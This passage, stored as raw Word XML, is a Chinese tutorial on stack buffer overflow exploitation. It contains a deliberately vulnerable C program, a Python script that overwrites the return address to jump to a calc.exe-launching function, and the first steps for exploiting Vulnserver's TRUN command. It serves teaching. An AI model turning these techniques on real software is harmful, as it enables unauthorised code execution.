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1CFB8">
      <w:pPr>
        <w:jc w:val="center"/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缓冲区溢出漏洞及利用示例一</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE59DB4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1. 漏洞程序代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA61019">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046649EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>#include &lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFE75F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>#include &lt;windows.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50607B56">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BD8AB5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>// 目标：攻击者希望在不被授权的情况下调用这个函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CE7AC4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>void secret_access() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A989751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printf("\n[!!!] 警告：已成功进入受保护的秘密函数！\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C36B8E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system("calc.exe"); // 弹出计算器作为攻击成功的证明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E98E8A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exit(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211DDBA9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFB16A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CAF2064">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>void process_data(char* input) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09383458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char buffer[64]; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD8E1DD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printf("处理数据的地址: %p\n", &amp;buffer);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A324240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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2438B00F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// 漏洞点：没有检查 input 的长度，直接拷贝到 64 字节的 buffer 中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396B78F7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strcpy(buffer, input); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2429C9C2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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B99A7D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printf("数据处理完成: %s\n", buffer);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4CF114">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBCEAAA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AAB8005">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>int main(int argc, char* argv[]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EF9425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if (argc &lt; 2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403B3F9D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printf("用法: %s &lt;输入字符串&gt;\n", argv[0]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE389C4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return 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0551EEED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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08984C8B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process_data(argv[1]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7380882F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return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6A6DC2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F93197">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32549B33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2. 漏洞利用分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280986CD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>要劫持执行流，我们需要构造一个精确的 Payload（攻击载荷）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3A7173">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C0D4653">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>内存布局计算</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB9A046">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Buffer 填充: 64 字节。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2600A0D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ED9D40F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>EBP 覆盖: 4 字节（x86 架构下）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F6A27B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EB512F5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>返回地址 (EIP): 紧跟其后的 4 字节。只要把这 4 字节改为 secret_access 函数的地址，程序就会跳转到那里。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4712FE05">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12B5D014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3. 漏洞利用脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABEE5E9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确定目标地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412F3040">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t># 假设通过调试器（如 x64dbg）查看到 secret_access 的地址是 0x00401234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC36739">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t># 注意：实际地址需根据你编译生成的 .exe 进行修改</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F645D9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target_address = 0x00401234 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EF21E0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FC2C833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构造填充数据 (Padding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A80826">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t># 64 字节的 buffer + 4 字节的 EBP = 68 字节</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44266A56">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>padding = b"A" * 68</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00485EEE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EA48DAD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构造返回地址 (EIP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC48DB7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t># 使用小端序转换地址：\x34\x12\x40\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C73D135">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>eip = struct.pack("&lt;I", target_address)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A55DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52EBE42D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>组合最终 Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF80ADA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>payload = padding + eip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5687EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="717F8B37">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t># 将 payload 写入文件或打印出来</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E726E6F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>with open("payload.bin", "wb") as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8FD60D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f.write(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5289AFA9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DCFE9B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>print("Payload 已生成，请执行以下命令：")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C4501E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>print(f"vuln_app.exe $(python -c \"print('A'*68 + '\\x34\\x12\\x40\\x00')\")")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC3B2B2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4. 利用步骤演示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0867A1CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>寻找地址: 使用 x64dbg 打开 vuln_app.exe。找到 secret_access 函数的入口地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48747D9E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FA07406">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>计算偏移: 通过输入一串特征字符（如 Aa0Aa1...）观察程序崩溃时 EIP 被哪几个字符覆盖，确定偏移量为 68。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F36BAFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="662637AE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>实施攻击:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5FB5BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FEDA808">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>在 CMD 中运行：vuln_app.exe &lt;生成的恶意字符串&gt;。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F0BE84">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EE65F3E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>结果: 程序本该在 process_data 结束后返回 main 并退出，但由于返回地址被篡改，它会跳转到 secret_access，屏幕上会弹出计算器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB85864">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34E30097">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D2AD34E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FFEBD00">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16C49C4F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0274F2E4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto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缓冲区溢出漏洞及利用示例二</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E57473">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Vulnserver 是一个专门为安全研究和渗透测试设计的“故意留有漏洞”的 Windows TCP 服务器。它模拟了真实软件中常见的各种缓冲区溢出漏洞（如栈溢出、SEH 溢出等）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7B559A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47FCC938">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>分析 Vulnserver 的经典漏洞——TRUN 命令栈溢出，是理解 Windows 漏洞利用（Exploit Development）的最佳路径。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E16BCE0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5431417A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1. 漏洞分析：TRUN 命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C03A08">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Vulnserver 中的 TRUN 命令由于使用了危险的 C 语言函数 strcpy，且未对用户输入长度进行校验，导致了典型的栈缓冲区溢出（Stack-based Buffer Overflow）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476FAB15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>void Function_TRUN(char *Input) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2643FDB9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char Buffer[2000]; // 固定大小的缓冲区</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C66D3E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// 漏洞点：如果 Input 超过 2000 字节，将溢出并覆盖返回地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A78799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strcpy(Buffer, Input); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA76DD9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D79B245">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>当攻击者发送包含超过 2000 字节的 TRUN /.:/ 命令时，溢出的数据会顺着内存地址向上生长，覆盖函数的 EBP（栈基址）和 EIP（指令指针）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24649F56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2. 漏洞利用 (Exploitation) 核心步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59791F87">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>在 Windows 10 上利用该漏洞，通常需要以下 6 个标准阶段：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD1428F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6792D0F9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>A. 模糊测试 (Fuzzing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BD9A1F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>使用 Python 脚本发送递增长度的字符串，确定程序崩溃的临界点。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FACF3F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54CE1F2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>现象：Vulnserver 停止响应，调试器（如 x64dbg）显示 EIP 被覆盖（例如 41414141）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D72363">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="347C55E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>B. 确定偏移量 (Finding the Offset)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654CFAE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>使用模式生成工具（如 msf-pattern_create）生成唯一字符串发送给服务器。通过崩溃时 EIP 的值，在 pattern_offset 中计算出精确的溢出距离（TRUN 命令通常在 2003 字节左右）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B82A7EE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58345671">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>C. 控制 EIP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3552CA53">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>将 Payload 构造为："A" * 2003 + "BBBB"。如果运行后 EIP 变为 42424242（B 的十六进制），说明我们已成功控制了程序的执行流。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C22CA7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="571DD5A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>D. 查找坏字符 (Identifying Bad Characters)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BEE3AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>由于 strcpy 会被某些字节（如 \x00 截断符）中断，我们需要通过对比内存，找出所有会导致 Payload 失效的“坏字符”。在 Vulnserver 中，常见的坏字符通常只有 \x00。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F11AC25">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
